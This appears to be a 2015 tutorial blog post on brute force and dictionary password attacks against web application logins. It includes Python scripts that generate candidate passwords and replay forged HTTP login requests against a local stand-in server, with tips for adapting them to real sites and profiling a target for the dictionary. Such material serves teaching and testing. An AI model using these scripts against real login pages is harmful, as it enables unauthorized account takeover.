11/27/15

Brute Force & Dictionary attacks on an Internet Application.

Brute Force Attack on Password.

we have a user name, for example: admin ... then we try every combination of characters as the password, using an automated script. the number of combinations grows exponentially with the password length & the size of the character set, so in practice this only works against short passwords, or when the script can run for a very long time.

for example:

user: admin password: 1 -- login fail
user: admin password: 2 -- login fail

... (many login attempts) ...

user: admin password: Z -- login fail
user: admin password: Z1 -- login fail
user: admin password: Z2 -- login fail

... (many login attempts) ...

user: admin password: T3h_s3cr3t -- login success.


Dictionary Attack on Password.

we have a user name, we have a dictionary of 'words' (character combinations), then we try each of the 'words' alone or concatenated into a longer password. again we use an automation tool, a script for example.

opinions vary on how often a dictionary attack cracks a password on its own, but it has its uses nevertheless.

often it's better to start with a dictionary, since it tries the most likely passwords first, & fall back to brute force or other methods later.

all the information we have about the individual we are trying to compromise (names, dates, interests ... as in the example below) is useful here for building a proper dictionary.

for a simplified example:

username: admin,
dictionary: 007, bond, eye, gold, golden, pistol, gun, beach, surf, cat, icecream, shake, martini, lemon, stir, _.

after running the script we'd have the following dictionary attack:

user: admin, password: 007 -- login fail
user: admin, password: bond -- login fail

... (many login attempts) ...

user: admin, password: 007007 -- login fail
user: admin, password: 007bond -- login fail
user: admin, password: 007eye -- login fail

... (many login attempts) ...

user: admin, password: 007_007 -- login fail
user: admin, password: 007_bond -- login success
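both candidate generators described above (the brute force enumeration from the first section & the dictionary concatenation from this one), as an added example in Python. this is not code from the original post; the 'login' is simulated by a local comparison against an assumed secret so it runs offline, & the order of candidates follows the attempt logs above: single characters or words first, then two-word, then three-word concatenations, with '_' treated as a dictionary word.

```python
import itertools
import string

# character set for brute force: digits, then lowercase, then uppercase,
# so the single-character candidates run 0..9, a..z, A..Z (Z last, as in the log above)
CHARSET = string.digits + string.ascii_letters

# the dictionary from the example above, in the same order ('_' is a 'word' too)
DICTIONARY = ["007", "bond", "eye", "gold", "golden", "pistol", "gun", "beach",
              "surf", "cat", "icecream", "shake", "martini", "lemon", "stir", "_"]


def brute_force_candidates(charset=CHARSET, max_len=4):
    """yield every string over charset, shortest first: all 1-char, then all 2-char, ..."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def dictionary_candidates(words, max_words=3):
    """yield each word alone, then every ordered concatenation of 2 .. max_words words"""
    for count in range(1, max_words + 1):
        for combo in itertools.product(words, repeat=count):
            yield "".join(combo)


def keyspace_size(charset_len, max_len):
    """how many candidates a full brute force of lengths 1 .. max_len has to try"""
    return sum(charset_len ** n for n in range(1, max_len + 1))


def attack(candidates, login):
    """try candidates in order until login(candidate) returns True;
    returns (password, attempts) on success, (None, attempts) if the list is exhausted"""
    attempts = 0
    for candidate in candidates:
        attempts += 1
        if login(candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    # stand-in for the real login: an assumed secret, compared locally
    secret = "007_bond"
    login = lambda password: password == secret

    print(attack(dictionary_candidates(DICTIONARY), login))       # ('007_bond', 514)
    # brute forcing the same 8-character secret over digits, letters & '_'
    # would have to try up to this many candidates:
    print(keyspace_size(len(CHARSET) + 1, len(secret)))
    # a short numeric PIN, on the other hand, falls quickly:
    print(attack(brute_force_candidates(string.digits, 4), lambda p: p == "7355"))  # ('7355', 8466)
```

the dictionary run finds 007_bond on the 514th attempt (16 single words, 256 pairs, then 242 triples), which is the whole point of the dictionary: the full brute force of an 8-character password over 63 characters is a keyspace of the order of 10^14, far beyond what an online login will ever let us try.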


Attack on an Internet Application.

The difference between logging in on a local system & logging into an Internet Application is that the login information is part of the HTTP(S) request.

We can create an HTTP(S) request manually, inserting the authentication data in the proper place, then send it to the attacked Internet Application from a script.

Provided there are no security mechanisms such as a 'Captcha', rate limiting or account lockout after a number of failed attempts, we'll log in after a certain amount of time & number of tries.

Knowledge of the HTTP(S) protocol comes in handy here ... at least part(s) of it, but perhaps we can just analyze the login-related traffic between our browser & the application using a tool such as the 'HTTP Trace' plugin for the 'Google Chrome' browser.


HTTPS Traffic.


then we can extract the HTTP request & forge a new, similar one, changing only the password each time.
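the request forging described in this section, as an added example in Python. it is not code from the original post & is not tied to any real application: a tiny local HTTP server stands in for the attacked application, with an assumed form login at /login that takes 'username' & 'password' fields & answers 200 either way, differing only in the body text. the script replays the POST a browser would send, once per candidate password, & tells 'login fail' from 'login success' by the marker seen in the captured traffic.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# constructed stand-in for the attacked application (not any real site)
TARGET_USER = "admin"
TARGET_PASS = "007_bond"          # assumption: the secret we are trying to recover


class LoginHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if self.path == "/login" and user == TARGET_USER and password == TARGET_PASS:
            body = b"Welcome back, admin"
        else:
            body = b"Invalid username or password"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # silence the per-request log lines
        pass


def start_target():
    """start the stand-in app on a free localhost port; returns (server, base_url)"""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def try_login(base_url, username, password, fail_marker=b"Invalid"):
    """forge the POST the browser sends for the login form & decide success from the reply.
    fail_marker is whatever the captured 'login fail' response contains & the
    'login success' response does not (a text, a redirect, a Set-Cookie header ...)"""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    request = urllib.request.Request(
        base_url + "/login",
        data=data,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "Mozilla/5.0"},   # look like the browser the traffic was captured from
    )
    with urllib.request.urlopen(request, timeout=5) as response:
        body = response.read()
    return fail_marker not in body


def online_attack(base_url, username, candidates):
    """send one forged request per candidate; returns (password, attempts) or (None, attempts)"""
    attempts = 0
    for candidate in candidates:
        attempts += 1
        if try_login(base_url, username, candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    server, url = start_target()
    try:
        # a short constructed candidate list stands in for the full dictionary
        print(online_attack(url, "admin", ["007", "bond", "007bond", "007_bond"]))  # ('007_bond', 4)
    finally:
        server.shutdown()
```

against a real application the URL, the form field names & the fail/success marker are all read off the captured browser traffic, & any extra fields the form sends (a hidden token, a cookie from the login page) have to be carried along in the forged request too, otherwise every attempt fails for a reason that has nothing to do with the password.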

there are ready-made tools as well, for example:
- THC-Hydra (Linux),
- Brutus (Windows).

... I'd use these preferably.


Hydra & Brutus - Online Password Cracking Tools.


